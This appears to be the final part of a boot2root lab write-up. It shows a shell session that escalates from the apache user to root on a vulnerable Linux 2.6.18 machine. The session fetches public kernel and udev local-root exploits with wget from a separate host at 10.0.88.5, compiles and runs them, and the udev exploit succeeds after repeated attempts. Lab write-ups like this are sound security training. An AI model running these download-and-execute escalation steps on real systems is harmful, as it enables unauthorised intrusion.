sh-3.2$ whoami
apache
sh-3.2$ id
uid=48(apache) gid=48(apache) groups=48(apache)

As is expected, our user doesn’t seem to have access to any other users’ home folders. BOO.

sh-3.2$ cd /home
sh-3.2$ ls -lsa
total 36
8 drwxr-xr-x  7 root  root  4096 Jun 24  2009 .
8 drwxr-xr-x 23 root  root  4096 Dec  9 12:26 ..
4 drwx------  2 fred  fred  4096 Jun 24  2009 fred
4 drwx------  3 john  john  4096 Jun 28  2009 john
4 drwx------  2 linda linda 4096 Jun 24  2009 linda
4 drwx------  2 molly molly 4096 Jun 24  2009 molly
4 drwx------  2 toby  toby  4096 Jun 24  2009 toby
sh-3.2$ 
sh-3.2$ cd fred
sh: cd: fred: Permission denied
sh-3.2$ cd john
sh: cd: john: Permission denied
sh-3.2$ cd linda
sh: cd: linda: Permission denied
sh-3.2$ cd molly
sh: cd: molly: Permission denied
sh-3.2$ cd toby
sh: cd: toby: Permission denied

Lucky for us, this specific kernel release looks to be vulnerable to a local privilege escalation exploit. The full exploit source can be found here.

sh-3.2$ uname -r
2.6.18-92.el5

Unfortunately, the local root exploit failed.

sh-3.2$ wget http://10.0.88.5/10613
--14:24:28--  http://10.0.88.5/10613
Connecting to 10.0.88.5:80... connected.
HTTP request sent, awaiting response... 404 Not Found
14:24:28 ERROR 404: Not Found.

sh-3.2$ wget http://10.0.88.5/10613.c
--14:24:42--  http://10.0.88.5/10613.c
Connecting to 10.0.88.5:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 6663 (6.5K) [text/x-csrc]
Saving to: `10613.c'

     0K ......                                                100% 1.10G=0s

14:24:42 (1.10 GB/s) - `10613.c' saved [6663/6663]

sh-3.2$ gcc 10613.c -o 10613
sh-3.2$ chmod +x 10613
sh-3.2$ ./10613
-----------------------------------
 Linux 2.6.18-20 2009 Local Root Exploit
 By DigitALL
-----------------------------------
[-] mmap: Permission denied

Rooted - Exploit Attempt #2

Circling back, let's try another exploit this machine may be vulnerable to: a local privilege escalation exploit affecting Linux Kernel 2.6 (Debian 4.0 / Ubuntu / Gentoo) UDEV < 1.4.1.

sh-3.2$ wget http://10.0.88.5/8478.sh
--15:13:27--  http://10.0.88.5/8478.sh
Connecting to 10.0.88.5:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 223595 (218K)
Saving to: `8478.sh'

     0K .......... .......... .......... .......... .......... 22% 71.6M 0s
    50K .......... .......... .......... .......... .......... 45%  336M 0s
   100K .......... .......... .......... .......... .......... 68%  146M 0s
   150K .......... .......... .......... .......... .......... 91%  174M 0s
   200K .......... ........                                   100%  434M=0.001s

15:13:27 (144 MB/s) - `8478.sh' saved [223595/223595]
sh-3.2$ chmod +x 8478.sh
sh-3.2$ cat /proc/net/netlink
sk       Eth Pid    Groups   Rmem     Wmem     Dump     Locks
f7fdce00 0   0      00000000 0        0        00000000 2
f6da2400 0   2444   00000111 0        0        00000000 2
f7dee000 6   0      00000000 0        0        00000000 2
f7d43800 7   0      00000000 0        0        00000000 2
f7f65000 9   0      00000000 0        0        00000000 2
f6e6da00 9   1765   00000000 0        0        00000000 2
f7f6de00 10  0      00000000 0        0        00000000 2
f7fa6e00 11  0      00000000 0        0        00000000 2
f7fdcc00 15  0      00000000 0        0        00000000 2
f7dfea00 15  380    ffffffff 0        0        00000000 2
f7fa6c00 16  0      00000000 0        0        00000000 2
c21b7a00 18  0      00000000 0        0        00000000 2

For some reason, this exploit required multiple passes to work.

sh-3.2$ ./8478.sh 380
suid.c: In function 'main':
suid.c:3: warning: incompatible implicit declaration of built-in function 'execl'
cp: `libno_ex.so.1.0' and `/tmp/libno_ex.so.1.0' are the same file
sh-3.2$ ./8478.sh 380
suid.c: In function 'main':
suid.c:3: warning: incompatible implicit declaration of built-in function 'execl'
cp: `libno_ex.so.1.0' and `/tmp/libno_ex.so.1.0' are the same file
sh-3.2$ ./8478.sh 380
suid.c: In function 'main':
suid.c:3: warning: incompatible implicit declaration of built-in function 'execl'
cp: `libno_ex.so.1.0' and `/tmp/libno_ex.so.1.0' are the same file
sh-3.2$ ./8478.sh 379
suid.c: In function 'main':
suid.c:3: warning: incompatible implicit declaration of built-in function 'execl'
cp: `libno_ex.so.1.0' and `/tmp/libno_ex.so.1.0' are the same file
sh-3.2$ ./8478.sh 379
suid.c: In function 'main':
suid.c:3: warning: incompatible implicit declaration of built-in function 'execl'
cp: `libno_ex.so.1.0' and `/tmp/libno_ex.so.1.0' are the same file
sh-3.2$ ./8478.sh 379
suid.c: In function 'main':
suid.c:3: warning: incompatible implicit declaration of built-in function 'execl'
cp: `libno_ex.so.1.0' and `/tmp/libno_ex.so.1.0' are the same file
sh-3.2$ ./8478.sh 379
suid.c: In function 'main':
suid.c:3: warning: incompatible implicit declaration of built-in function 'execl'
cp: `libno_ex.so.1.0' and `/tmp/libno_ex.so.1.0' are the same file
sh-3.2# id
uid=0(root) gid=0(root) groups=48(apache)


EOL

Thank you for hanging around for this boot2root! I learned quite a bit working through this machine and I hope you did as well in your attempt.
As always, if you have any questions, corrections, or comments, please feel free to reach out to me on Twitter and have yourself an excellent day!